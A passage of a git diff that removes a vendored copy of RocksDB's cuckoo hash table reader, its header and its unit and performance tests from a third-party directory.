-                              GetContext* get_context, bool skip_filters) {
-  assert(key.size() == key_length_ + (is_last_level_ ? 8 : 0));
-  Slice user_key = ExtractUserKey(key);
-  for (uint32_t hash_cnt = 0; hash_cnt < num_hash_func_; ++hash_cnt) {
-    uint64_t offset = bucket_length_ * CuckooHash(
-        user_key, hash_cnt, use_module_hash_, table_size_,
-        identity_as_first_hash_, get_slice_hash_);
-    const char* bucket = &file_data_.data()[offset];
-    for (uint32_t block_idx = 0; block_idx < cuckoo_block_size_;
-         ++block_idx, bucket += bucket_length_) {
-      if (ucomp_->Equal(Slice(unused_key_.data(), user_key.size()),
-                        Slice(bucket, user_key.size()))) {
-        return Status::OK();
-      }
-      // Here, we compare only the user key part as we support only one entry
-      // per user key and we don't support snapshot.
-      if (ucomp_->Equal(user_key, Slice(bucket, user_key.size()))) {
-        Slice value(bucket + key_length_, value_length_);
-        if (is_last_level_) {
-          // Sequence number is not stored at the last level, so we will use
-          // kMaxSequenceNumber since it is unknown.  This could cause some
-          // transactions to fail to lock a key due to known sequence number.
-          // However, it is expected for anyone to use a CuckooTable in a
-          // TransactionDB.
-          get_context->SaveValue(value, kMaxSequenceNumber);
-        } else {
-          Slice full_key(bucket, key_length_);
-          ParsedInternalKey found_ikey;
-          ParseInternalKey(full_key, &found_ikey);
-          get_context->SaveValue(found_ikey, value);
-        }
-        // We don't support merge operations. So, we return here.
-        return Status::OK();
-      }
-    }
-  }
-  return Status::OK();
-}
-
-void CuckooTableReader::Prepare(const Slice& key) {
-  // Prefetch the first Cuckoo Block.
-  Slice user_key = ExtractUserKey(key);
-  uint64_t addr = reinterpret_cast<uint64_t>(file_data_.data()) +
-    bucket_length_ * CuckooHash(user_key, 0, use_module_hash_, table_size_,
-                                identity_as_first_hash_, nullptr);
-  uint64_t end_addr = addr + cuckoo_block_bytes_minus_one_;
-  for (addr &= CACHE_LINE_MASK; addr < end_addr; addr += CACHE_LINE_SIZE) {
-    PREFETCH(reinterpret_cast<const char*>(addr), 0, 3);
-  }
-}
-
-class CuckooTableIterator : public InternalIterator {
- public:
-  explicit CuckooTableIterator(CuckooTableReader* reader);
-  ~CuckooTableIterator() {}
-  bool Valid() const override;
-  void SeekToFirst() override;
-  void SeekToLast() override;
-  void Seek(const Slice& target) override;
-  void SeekForPrev(const Slice& target) override;
-  void Next() override;
-  void Prev() override;
-  Slice key() const override;
-  Slice value() const override;
-  Status status() const override { return status_; }
-  void InitIfNeeded();
-
- private:
-  struct BucketComparator {
-    BucketComparator(const Slice& file_data, const Comparator* ucomp,
-                     uint32_t bucket_len, uint32_t user_key_len,
-                     const Slice& target = Slice())
-      : file_data_(file_data),
-        ucomp_(ucomp),
-        bucket_len_(bucket_len),
-        user_key_len_(user_key_len),
-        target_(target) {}
-    bool operator()(const uint32_t first, const uint32_t second) const {
-      const char* first_bucket =
-        (first == kInvalidIndex) ? target_.data() :
-                                   &file_data_.data()[first * bucket_len_];
-      const char* second_bucket =
-        (second == kInvalidIndex) ? target_.data() :
-                                    &file_data_.data()[second * bucket_len_];
-      return ucomp_->Compare(Slice(first_bucket, user_key_len_),
-                             Slice(second_bucket, user_key_len_)) < 0;
-    }
-   private:
-    const Slice file_data_;
-    const Comparator* ucomp_;
-    const uint32_t bucket_len_;
-    const uint32_t user_key_len_;
-    const Slice target_;
-  };
-
-  const BucketComparator bucket_comparator_;
-  void PrepareKVAtCurrIdx();
-  CuckooTableReader* reader_;
-  bool initialized_;
-  Status status_;
-  // Contains a map of keys to bucket_id sorted in key order.
-  std::vector<uint32_t> sorted_bucket_ids_;
-  // We assume that the number of items can be stored in uint32 (4 Billion).
-  uint32_t curr_key_idx_;
-  Slice curr_value_;
-  IterKey curr_key_;
-  // No copying allowed
-  CuckooTableIterator(const CuckooTableIterator&) = delete;
-  void operator=(const Iterator&) = delete;
-};
-
-CuckooTableIterator::CuckooTableIterator(CuckooTableReader* reader)
-  : bucket_comparator_(reader->file_data_, reader->ucomp_,
-                       reader->bucket_length_, reader->user_key_length_),
-    reader_(reader),
-    initialized_(false),
-    curr_key_idx_(kInvalidIndex) {
-  sorted_bucket_ids_.clear();
-  curr_value_.clear();
-  curr_key_.Clear();
-}
-
-void CuckooTableIterator::InitIfNeeded() {
-  if (initialized_) {
-    return;
-  }
-  sorted_bucket_ids_.reserve(reader_->GetTableProperties()->num_entries);
-  uint64_t num_buckets = reader_->table_size_ + reader_->cuckoo_block_size_ - 1;
-  assert(num_buckets < kInvalidIndex);
-  const char* bucket = reader_->file_data_.data();
-  for (uint32_t bucket_id = 0; bucket_id < num_buckets; ++bucket_id) {
-    if (Slice(bucket, reader_->key_length_) != Slice(reader_->unused_key_)) {
-      sorted_bucket_ids_.push_back(bucket_id);
-    }
-    bucket += reader_->bucket_length_;
-  }
-  assert(sorted_bucket_ids_.size() ==
-      reader_->GetTableProperties()->num_entries);
-  std::sort(sorted_bucket_ids_.begin(), sorted_bucket_ids_.end(),
-            bucket_comparator_);
-  curr_key_idx_ = kInvalidIndex;
-  initialized_ = true;
-}
-
-void CuckooTableIterator::SeekToFirst() {
-  InitIfNeeded();
-  curr_key_idx_ = 0;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::SeekToLast() {
-  InitIfNeeded();
-  curr_key_idx_ = static_cast<uint32_t>(sorted_bucket_ids_.size()) - 1;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::Seek(const Slice& target) {
-  InitIfNeeded();
-  const BucketComparator seek_comparator(
-      reader_->file_data_, reader_->ucomp_,
-      reader_->bucket_length_, reader_->user_key_length_,
-      ExtractUserKey(target));
-  auto seek_it = std::lower_bound(sorted_bucket_ids_.begin(),
-      sorted_bucket_ids_.end(),
-      kInvalidIndex,
-      seek_comparator);
-  curr_key_idx_ =
-      static_cast<uint32_t>(std::distance(sorted_bucket_ids_.begin(), seek_it));
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::SeekForPrev(const Slice& target) {
-  // Not supported
-  assert(false);
-}
-
-bool CuckooTableIterator::Valid() const {
-  return curr_key_idx_ < sorted_bucket_ids_.size();
-}
-
-void CuckooTableIterator::PrepareKVAtCurrIdx() {
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  uint32_t id = sorted_bucket_ids_[curr_key_idx_];
-  const char* offset = reader_->file_data_.data() +
-                       id * reader_->bucket_length_;
-  if (reader_->is_last_level_) {
-    // Always return internal key.
-    curr_key_.SetInternalKey(Slice(offset, reader_->user_key_length_),
-                             0, kTypeValue);
-  } else {
-    curr_key_.SetInternalKey(Slice(offset, reader_->key_length_));
-  }
-  curr_value_ = Slice(offset + reader_->key_length_, reader_->value_length_);
-}
-
-void CuckooTableIterator::Next() {
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  ++curr_key_idx_;
-  PrepareKVAtCurrIdx();
-}
-
-void CuckooTableIterator::Prev() {
-  if (curr_key_idx_ == 0) {
-    curr_key_idx_ = static_cast<uint32_t>(sorted_bucket_ids_.size());
-  }
-  if (!Valid()) {
-    curr_value_.clear();
-    curr_key_.Clear();
-    return;
-  }
-  --curr_key_idx_;
-  PrepareKVAtCurrIdx();
-}
-
-Slice CuckooTableIterator::key() const {
-  assert(Valid());
-  return curr_key_.GetInternalKey();
-}
-
-Slice CuckooTableIterator::value() const {
-  assert(Valid());
-  return curr_value_;
-}
-
-extern InternalIterator* NewErrorInternalIterator(const Status& status,
-                                                  Arena* arena);
-
-InternalIterator* CuckooTableReader::NewIterator(
-    const ReadOptions& read_options, Arena* arena, bool skip_filters) {
-  if (!status().ok()) {
-    return NewErrorInternalIterator(
-        Status::Corruption("CuckooTableReader status is not okay."), arena);
-  }
-  CuckooTableIterator* iter;
-  if (arena == nullptr) {
-    iter = new CuckooTableIterator(this);
-  } else {
-    auto iter_mem = arena->AllocateAligned(sizeof(CuckooTableIterator));
-    iter = new (iter_mem) CuckooTableIterator(this);
-  }
-  return iter;
-}
-
-size_t CuckooTableReader::ApproximateMemoryUsage() const { return 0; }
-
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader.h b/thirdparty/rocksdb/table/cuckoo_table_reader.h
deleted file mode 100644
index 4beac8f..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader.h
+++ /dev/null
@@ -1,86 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <string>
-#include <memory>
-#include <utility>
-#include <vector>
-
-#include "db/dbformat.h"
-#include "options/cf_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/table_reader.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Arena;
-class TableReader;
-class InternalIterator;
-
-class CuckooTableReader: public TableReader {
- public:
-  CuckooTableReader(const ImmutableCFOptions& ioptions,
-                    std::unique_ptr<RandomAccessFileReader>&& file,
-                    uint64_t file_size, const Comparator* user_comparator,
-                    uint64_t (*get_slice_hash)(const Slice&, uint32_t,
-                                               uint64_t));
-  ~CuckooTableReader() {}
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override {
-    return table_props_;
-  }
-
-  Status status() const { return status_; }
-
-  Status Get(const ReadOptions& read_options, const Slice& key,
-             GetContext* get_context, bool skip_filters = false) override;
-
-  InternalIterator* NewIterator(
-      const ReadOptions&, Arena* arena = nullptr,
-      bool skip_filters = false) override;
-  void Prepare(const Slice& target) override;
-
-  // Report an approximation of how much memory has been used.
-  size_t ApproximateMemoryUsage() const override;
-
-  // Following methods are not implemented for Cuckoo Table Reader
-  uint64_t ApproximateOffsetOf(const Slice& key) override { return 0; }
-  void SetupForCompaction() override {}
-  // End of methods not implemented.
-
- private:
-  friend class CuckooTableIterator;
-  void LoadAllKeys(std::vector<std::pair<Slice, uint32_t>>* key_to_bucket_id);
-  std::unique_ptr<RandomAccessFileReader> file_;
-  Slice file_data_;
-  bool is_last_level_;
-  bool identity_as_first_hash_;
-  bool use_module_hash_;
-  std::shared_ptr<const TableProperties> table_props_;
-  Status status_;
-  uint32_t num_hash_func_;
-  std::string unused_key_;
-  uint32_t key_length_;
-  uint32_t user_key_length_;
-  uint32_t value_length_;
-  uint32_t bucket_length_;
-  uint32_t cuckoo_block_size_;
-  uint32_t cuckoo_block_bytes_minus_one_;
-  uint64_t table_size_;
-  const Comparator* ucomp_;
-  uint64_t (*get_slice_hash_)(const Slice& s, uint32_t index,
-      uint64_t max_num_buckets);
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc b/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc
deleted file mode 100644
index 7e131e5..0000000
--- a/thirdparty/rocksdb/table/cuckoo_table_reader_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run this test... Skipping...\n");
-  return 0;
-}
-#else
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <gflags/gflags.h>
-#include <vector>
-#include <string>
-#include <map>
-
-#include "table/meta_blocks.h"
-#include "table/cuckoo_table_builder.h"
-#include "table/cuckoo_table_reader.h"
-#include "table/cuckoo_table_factory.h"
-#include "table/get_context.h"
-#include "util/arena.h"
-#include "util/random.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-DEFINE_string(file_dir, "", "Directory where the files will be created"
-    " for benchmark. Added for using tmpfs.");
-DEFINE_bool(enable_perf, false, "Run Benchmark Tests too.");
-DEFINE_bool(write, false,
-    "Should write new values to file in performance tests?");
-DEFINE_bool(identity_as_first_hash, true, "use identity as first hash");
-
-namespace rocksdb {
-
-namespace {
-const uint32_t kNumHashFunc = 10;
-// Methods, variables related to Hash functions.
-std::unordered_map<std::string, std::vector<uint64_t>> hash_map;
-
-void AddHashLookups(const std::string& s, uint64_t bucket_id,
-        uint32_t num_hash_fun) {
-  std::vector<uint64_t> v;
-  for (uint32_t i = 0; i < num_hash_fun; i++) {
-    v.push_back(bucket_id + i);
-  }
-  hash_map[s] = v;
-}
-
-uint64_t GetSliceHash(const Slice& s, uint32_t index,
-    uint64_t max_num_buckets) {
-  return hash_map[s.ToString()][index];
-}
-}  // namespace
-
-class CuckooReaderTest : public testing::Test {
- public:
-  using testing::Test::SetUp;
-
-  CuckooReaderTest() {
-    options.allow_mmap_reads = true;
-    env = options.env;
-    env_options = EnvOptions(options);
-  }
-
-  void SetUp(int num) {
-    num_items = num;
-    hash_map.clear();
-    keys.clear();
-    keys.resize(num_items);
-    user_keys.clear();
-    user_keys.resize(num_items);
-    values.clear();
-    values.resize(num_items);
-  }
-
-  std::string NumToStr(int64_t i) {
-    return std::string(reinterpret_cast<char*>(&i), sizeof(i));
-  }
-
-  void CreateCuckooFileAndCheckReader(
-      const Comparator* ucomp = BytewiseComparator()) {
-    std::unique_ptr<WritableFile> writable_file;
-    ASSERT_OK(env->NewWritableFile(fname, &writable_file, env_options));
-    unique_ptr<WritableFileWriter> file_writer(
-        new WritableFileWriter(std::move(writable_file), env_options));
-
-    CuckooTableBuilder builder(
-        file_writer.get(), 0.9, kNumHashFunc, 100, ucomp, 2, false, false,
-        GetSliceHash, 0 /* column_family_id */, kDefaultColumnFamilyName);
-    ASSERT_OK(builder.status());
-    for (uint32_t key_idx = 0; key_idx < num_items; ++key_idx) {
-      builder.Add(Slice(keys[key_idx]), Slice(values[key_idx]));
-      ASSERT_OK(builder.status());
-      ASSERT_EQ(builder.NumEntries(), key_idx + 1);
-    }
-    ASSERT_OK(builder.Finish());
-    ASSERT_EQ(num_items, builder.NumEntries());
-    file_size = builder.FileSize();
-    ASSERT_OK(file_writer->Close());
-
-    // Check reader now.
-    std::unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    const ImmutableCFOptions ioptions(options);
-    CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucomp,
-                             GetSliceHash);
-    ASSERT_OK(reader.status());
-    // Assume no merge/deletion
-    for (uint32_t i = 0; i < num_items; ++i) {
-      PinnableSlice value;
-      GetContext get_context(ucomp, nullptr, nullptr, nullptr,
-                             GetContext::kNotFound, Slice(user_keys[i]), &value,
-                             nullptr, nullptr, nullptr, nullptr);
-      ASSERT_OK(reader.Get(ReadOptions(), Slice(keys[i]), &get_context));
-      ASSERT_STREQ(values[i].c_str(), value.data());
-    }
-  }
-  void UpdateKeys(bool with_zero_seqno) {
-    for (uint32_t i = 0; i < num_items; i++) {
-      ParsedInternalKey ikey(user_keys[i],
-          with_zero_seqno ? 0 : i + 1000, kTypeValue);
-      keys[i].clear();
-      AppendInternalKey(&keys[i], ikey);
-    }
-  }
-
-  void CheckIterator(const Comparator* ucomp = BytewiseComparator()) {
-    std::unique_ptr<RandomAccessFile> read_file;
-    ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-    unique_ptr<RandomAccessFileReader> file_reader(
-        new RandomAccessFileReader(std::move(read_file), fname));
-    const ImmutableCFOptions ioptions(options);
-    CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucomp,
-                             GetSliceHash);
-    ASSERT_OK(reader.status());
-    InternalIterator* it = reader.NewIterator(ReadOptions(), nullptr);
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(!it->Valid());
-    it->SeekToFirst();
-    int cnt = 0;
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      ++cnt;
-      it->Next();
-    }
-    ASSERT_EQ(static_cast<uint32_t>(cnt), num_items);
-
-    it->SeekToLast();
-    cnt = static_cast<int>(num_items) - 1;
-    ASSERT_TRUE(it->Valid());
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      --cnt;
-      it->Prev();
-    }
-    ASSERT_EQ(cnt, -1);
-
-    cnt = static_cast<int>(num_items) / 2;
-    it->Seek(keys[cnt]);
-    while (it->Valid()) {
-      ASSERT_OK(it->status());
-      ASSERT_TRUE(Slice(keys[cnt]) == it->key());
-      ASSERT_TRUE(Slice(values[cnt]) == it->value());
-      ++cnt;
-      it->Next();
-    }
-    ASSERT_EQ(static_cast<uint32_t>(cnt), num_items);
-    delete it;
-
-    Arena arena;
-    it = reader.NewIterator(ReadOptions(), &arena);
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(!it->Valid());
-    it->Seek(keys[num_items/2]);
-    ASSERT_TRUE(it->Valid());
-    ASSERT_OK(it->status());
-    ASSERT_TRUE(keys[num_items/2] == it->key());
-    ASSERT_TRUE(values[num_items/2] == it->value());
-    ASSERT_OK(it->status());
-    it->~InternalIterator();
-  }
-
-  std::vector<std::string> keys;
-  std::vector<std::string> user_keys;
-  std::vector<std::string> values;
-  uint64_t num_items;
-  std::string fname;
-  uint64_t file_size;
-  Options options;
-  Env* env;
-  EnvOptions env_options;
-};
-
-TEST_F(CuckooReaderTest, WhenKeyExists) {
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_WhenKeyExists";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values.
-    AddHashLookups(user_keys[i], i, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-  // Test with collision. Make all hash values collide.
-  hash_map.clear();
-  for (uint32_t i = 0; i < num_items; i++) {
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  UpdateKeys(false);
-  CreateCuckooFileAndCheckReader();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-}
-
-TEST_F(CuckooReaderTest, WhenKeyExistsWithUint64Comparator) {
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReaderUint64_WhenKeyExists";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i].resize(8);
-    memcpy(&user_keys[i][0], static_cast<void*>(&i), 8);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values.
-    AddHashLookups(user_keys[i], i, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Test with collision. Make all hash values collide.
-  hash_map.clear();
-  for (uint32_t i = 0; i < num_items; i++) {
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  UpdateKeys(false);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-}
-
-TEST_F(CuckooReaderTest, CheckIterator) {
-  SetUp(2*kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_CheckIterator";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values, in reverse order.
-    AddHashLookups(user_keys[i], num_items-i-1, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader();
-  CheckIterator();
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader();
-  CheckIterator();
-}
-
-TEST_F(CuckooReaderTest, CheckIteratorUint64) {
-  SetUp(2*kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_CheckIterator";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i].resize(8);
-    memcpy(&user_keys[i][0], static_cast<void*>(&i), 8);
-    ParsedInternalKey ikey(user_keys[i], 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Give disjoint hash values, in reverse order.
-    AddHashLookups(user_keys[i], num_items-i-1, kNumHashFunc);
-  }
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  CheckIterator(test::Uint64Comparator());
-  // Last level file.
-  UpdateKeys(true);
-  CreateCuckooFileAndCheckReader(test::Uint64Comparator());
-  CheckIterator(test::Uint64Comparator());
-}
-
-TEST_F(CuckooReaderTest, WhenKeyNotFound) {
-  // Add keys with colliding hash values.
-  SetUp(kNumHashFunc);
-  fname = test::TmpDir() + "/CuckooReader_WhenKeyNotFound";
-  for (uint64_t i = 0; i < num_items; i++) {
-    user_keys[i] = "key" + NumToStr(i);
-    ParsedInternalKey ikey(user_keys[i], i + 1000, kTypeValue);
-    AppendInternalKey(&keys[i], ikey);
-    values[i] = "value" + NumToStr(i);
-    // Make all hash values collide.
-    AddHashLookups(user_keys[i], 0, kNumHashFunc);
-  }
-  auto* ucmp = BytewiseComparator();
-  CreateCuckooFileAndCheckReader();
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size, ucmp,
-                           GetSliceHash);
-  ASSERT_OK(reader.status());
-  // Search for a key with colliding hash values.
-  std::string not_found_user_key = "key" + NumToStr(num_items);
-  std::string not_found_key;
-  AddHashLookups(not_found_user_key, 0, kNumHashFunc);
-  ParsedInternalKey ikey(not_found_user_key, 1000, kTypeValue);
-  AppendInternalKey(&not_found_key, ikey);
-  PinnableSlice value;
-  GetContext get_context(ucmp, nullptr, nullptr, nullptr, GetContext::kNotFound,
-                         Slice(not_found_key), &value, nullptr, nullptr,
-                         nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(not_found_key), &get_context));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-  // Search for a key with an independent hash value.
-  std::string not_found_user_key2 = "key" + NumToStr(num_items + 1);
-  AddHashLookups(not_found_user_key2, kNumHashFunc, kNumHashFunc);
-  ParsedInternalKey ikey2(not_found_user_key2, 1000, kTypeValue);
-  std::string not_found_key2;
-  AppendInternalKey(&not_found_key2, ikey2);
-  value.Reset();
-  GetContext get_context2(ucmp, nullptr, nullptr, nullptr,
-                          GetContext::kNotFound, Slice(not_found_key2), &value,
-                          nullptr, nullptr, nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(not_found_key2), &get_context2));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-
-  // Test read when key is unused key.
-  std::string unused_key =
-    reader.GetTableProperties()->user_collected_properties.at(
-    CuckooTablePropertyNames::kEmptyKey);
-  // Add hash values that map to empty buckets.
-  AddHashLookups(ExtractUserKey(unused_key).ToString(),
-      kNumHashFunc, kNumHashFunc);
-  value.Reset();
-  GetContext get_context3(ucmp, nullptr, nullptr, nullptr,
-                          GetContext::kNotFound, Slice(unused_key), &value,
-                          nullptr, nullptr, nullptr, nullptr);
-  ASSERT_OK(reader.Get(ReadOptions(), Slice(unused_key), &get_context3));
-  ASSERT_TRUE(value.empty());
-  ASSERT_OK(reader.status());
-}
-
-// Performance tests
-namespace {
-void GetKeys(uint64_t num, std::vector<std::string>* keys) {
-  keys->clear();
-  IterKey k;
-  k.SetInternalKey("", 0, kTypeValue);
-  std::string internal_key_suffix = k.GetInternalKey().ToString();
-  ASSERT_EQ(static_cast<size_t>(8), internal_key_suffix.size());
-  for (uint64_t key_idx = 0; key_idx < num; ++key_idx) {
-    uint64_t value = 2 * key_idx;
-    std::string new_key(reinterpret_cast<char*>(&value), sizeof(value));
-    new_key += internal_key_suffix;
-    keys->push_back(new_key);
-  }
-}
-
-std::string GetFileName(uint64_t num) {
-  if (FLAGS_file_dir.empty()) {
-    FLAGS_file_dir = test::TmpDir();
-  }
-  return FLAGS_file_dir + "/cuckoo_read_benchmark" +
-    ToString(num/1000000) + "Mkeys";
-}
-
-// Create last level file as we are interested in measuring performance of
-// last level file only.
-void WriteFile(const std::vector<std::string>& keys,
-    const uint64_t num, double hash_ratio) {
-  Options options;
-  options.allow_mmap_reads = true;
-  Env* env = options.env;
-  EnvOptions env_options = EnvOptions(options);
-  std::string fname = GetFileName(num);
-
-  std::unique_ptr<WritableFile> writable_file;
-  ASSERT_OK(env->NewWritableFile(fname, &writable_file, env_options));
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(writable_file), env_options));
-  CuckooTableBuilder builder(
-      file_writer.get(), hash_ratio, 64, 1000, test::Uint64Comparator(), 5,
-      false, FLAGS_identity_as_first_hash, nullptr, 0 /* column_family_id */,
-      kDefaultColumnFamilyName);
-  ASSERT_OK(builder.status());
-  for (uint64_t key_idx = 0; key_idx < num; ++key_idx) {
-    // Value is just a part of key.
-    builder.Add(Slice(keys[key_idx]), Slice(&keys[key_idx][0], 4));
-    ASSERT_EQ(builder.NumEntries(), key_idx + 1);
-    ASSERT_OK(builder.status());
-  }
-  ASSERT_OK(builder.Finish());
-  ASSERT_EQ(num, builder.NumEntries());
-  ASSERT_OK(file_writer->Close());
-
-  uint64_t file_size;
-  env->GetFileSize(fname, &file_size);
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size,
-                           test::Uint64Comparator(), nullptr);
-  ASSERT_OK(reader.status());
-  ReadOptions r_options;
-  PinnableSlice value;
-  // Assume only the fast path is triggered
-  GetContext get_context(nullptr, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, Slice(), &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  for (uint64_t i = 0; i < num; ++i) {
-    value.Reset();
-    value.clear();
-    ASSERT_OK(reader.Get(r_options, Slice(keys[i]), &get_context));
-    ASSERT_TRUE(Slice(keys[i]) == Slice(&keys[i][0], 4));
-  }
-}
-
-void ReadKeys(uint64_t num, uint32_t batch_size) {
-  Options options;
-  options.allow_mmap_reads = true;
-  Env* env = options.env;
-  EnvOptions env_options = EnvOptions(options);
-  std::string fname = GetFileName(num);
-
-  uint64_t file_size;
-  env->GetFileSize(fname, &file_size);
-  std::unique_ptr<RandomAccessFile> read_file;
-  ASSERT_OK(env->NewRandomAccessFile(fname, &read_file, env_options));
-  unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(read_file), fname));
-
-  const ImmutableCFOptions ioptions(options);
-  CuckooTableReader reader(ioptions, std::move(file_reader), file_size,
-                           test::Uint64Comparator(), nullptr);
-  ASSERT_OK(reader.status());
-  const UserCollectedProperties user_props =
-    reader.GetTableProperties()->user_collected_properties;
-  const uint32_t num_hash_fun = *reinterpret_cast<const uint32_t*>(
-      user_props.at(CuckooTablePropertyNames::kNumHashFunc).data());
-  const uint64_t table_size = *reinterpret_cast<const uint64_t*>(
-      user_props.at(CuckooTablePropertyNames::kHashTableSize).data());
-  fprintf(stderr, "With %" PRIu64 " items, utilization is %.2f%%, number of"
-      " hash functions: %u.\n", num, num * 100.0 / (table_size), num_hash_fun);
-  ReadOptions r_options;
-
-  std::vector<uint64_t> keys;
-  keys.reserve(num);
-  for (uint64_t i = 0; i < num; ++i) {
-    keys.push_back(2 * i);
-  }
-  std::random_shuffle(keys.begin(), keys.end());
-
-  PinnableSlice value;
-  // Assume only the fast path is triggered
-  GetContext get_context(nullptr, nullptr, nullptr, nullptr,
-                         GetContext::kNotFound, Slice(), &value, nullptr,
-                         nullptr, nullptr, nullptr);
-  uint64_t start_time = env->NowMicros();
-  if (batch_size > 0) {
-    for (uint64_t i = 0; i < num; i += batch_size) {
-      for (uint64_t j = i; j < i+batch_size && j < num; ++j) {
-        reader.Prepare(Slice(reinterpret_cast<char*>(&keys[j]), 16));
-      }
-      for (uint64_t j = i; j < i+batch_size && j < num; ++j) {
-        reader.Get(r_options, Slice(reinterpret_cast<char*>(&keys[j]), 16),
-                   &get_context);
-      }
-    }
-  } else {
-    for (uint64_t i = 0; i < num; i++) {
-      reader.Get(r_options, Slice(reinterpret_cast<char*>(&keys[i]), 16),
-                 &get_context);
-    }
-  }
